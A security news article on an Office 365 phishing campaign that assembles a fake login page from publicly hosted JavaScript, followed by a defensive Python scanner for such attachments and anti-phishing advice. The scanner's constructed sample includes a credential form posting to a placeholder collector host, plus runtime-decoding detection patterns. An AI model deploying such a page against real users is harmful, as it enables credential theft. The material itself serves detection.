Office 365 phishing campaign uses publicly hosted JavaScript code

A new phishing campaign targeting Office 365 users tries to evade email security controls by splitting the phishing page into pieces of HTML code that are delivered through publicly hosted JavaScript and assembled only when the attachment is opened.

Email and phishing page

The phishing email carries the subject “price revision” and has no body, only an attachment (hercus-Investment 547183-xlsx.Html). At first glance the file looks like an Excel spreadsheet, but it is actually an HTML document containing encoded text that points to two URLs located at yourjavascript.com, a free JavaScript hosting service, plus a separate piece of HTML code.

The first JavaScript file contains the HTML code that opens the HTML tag and validates the victim’s email address and password input; the second contains the body of the HTML code and the code that triggers the message pop-up.

These pieces of HTML code, combined with the piece embedded in the HTML attachment itself, open a browser window focused on the phishing page:

(Image: Office 365 phishing page assembled from the hosted JavaScript)

The code contains the target’s email address and pre-fills it into the fake login box so the phishing page looks legitimate. The phishing site also validates the format of the email address and the length of the password, explained Trustwave SpiderLabs researcher Homer Pacag.

Once the victim submits their login credentials, those credentials are compromised; the victim is then shown a page stating that their account or password is incorrect and inviting them to try logging in again.
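The traits described above (a double-extension HTML attachment, script tags pulling code from a free JavaScript host, inline code that decodes and writes HTML at runtime, and a password form posting to a third-party host) can be checked mechanically by a mail gateway or an analyst. The following scanner is an added example, not code from the article or from Trustwave; the sample attachment, the collector host and the list of public JavaScript hosts are constructed for illustration and are not the campaign’s real infrastructure.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample that mimics the attachment described in the article.
# Paths and the "collector.example" host are hypothetical placeholders.
SAMPLE_ATTACHMENT_NAME = "hercus-Investment 547183-xlsx.Html"
SAMPLE_ATTACHMENT = """<html><head>
<script src="https://yourjavascript.com/example/part1.js"></script>
<script src="https://yourjavascript.com/example/part2.js"></script>
</head><body>
<script>document.write(unescape('%3Cdiv%20id%3D%22login%22%3E'));</script>
<form action="https://collector.example/post.php" method="post">
<input name="loginfmt" type="email"><input name="passwd" type="password">
</form></body></html>"""

# Free/public script hosts that rarely appear in legitimate business mail
# (constructed list; extend from your own telemetry).
PUBLIC_JS_HOSTS = {"yourjavascript.com"}


class AttachmentScanner(HTMLParser):
    """Collects script sources, form targets and inline script text."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.form_actions = []
        self.inline_script = []
        self.has_password_input = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_input = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_script.append(data)


def scan_attachment(filename, html):
    """Return a list of human-readable findings for an HTML attachment."""
    findings = []

    # 1. Document-looking name with a trailing .htm/.html extension.
    if re.search(r"[-.](xlsx?|docx?|pdf)\.html?$", filename, re.I):
        findings.append("double-extension filename disguised as a document")

    parser = AttachmentScanner()
    parser.feed(html)

    # 2. Page pieces fetched from a public JavaScript hosting service.
    hosts = {urlparse(s).hostname for s in parser.script_srcs}
    for host in sorted(h for h in hosts if h):
        if host in PUBLIC_JS_HOSTS:
            findings.append(f"external script loaded from public JS host {host}")

    # 3. HTML assembled at runtime from encoded text.
    inline = "\n".join(parser.inline_script)
    if re.search(r"document\.write\s*\(\s*unescape\s*\(|\batob\s*\(|\beval\s*\(", inline):
        findings.append("inline script decodes and writes HTML at runtime")

    # 4. A credential form inside a mail attachment posting to a remote host.
    if parser.has_password_input:
        for action in parser.form_actions:
            host = urlparse(action).hostname
            if host:
                findings.append(f"password form posts to {host}")

    return findings


def is_suspicious(findings, threshold=2):
    """Two or more independent indicators is a reasonable block/quarantine bar."""
    return len(findings) >= threshold


if __name__ == "__main__":
    result = scan_attachment(SAMPLE_ATTACHMENT_NAME, SAMPLE_ATTACHMENT)
    for line in result:
        print("-", line)
    print("suspicious:", is_suspicious(result))
```

Run against the constructed sample, all four indicators fire; a plain HTML attachment with no scripts or forms produces no findings. The threshold keeps a single weak signal (for example one external script) from blocking legitimate mail on its own.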

Spotting phishing sites

Needless to say, you should always be careful when evaluating unsolicited emails, and you should not indiscriminately download and open the attachments (or follow the links) they contain.

You should always check the URL of any login page you are presented with and make sure it is the same one you usually see when accessing that online service.

Besides remembering passwords, password managers are also good at spotting phishing sites: because they tie stored credentials to the site’s real domain, they will not silently auto-fill the login credentials that a look-alike page asks for.
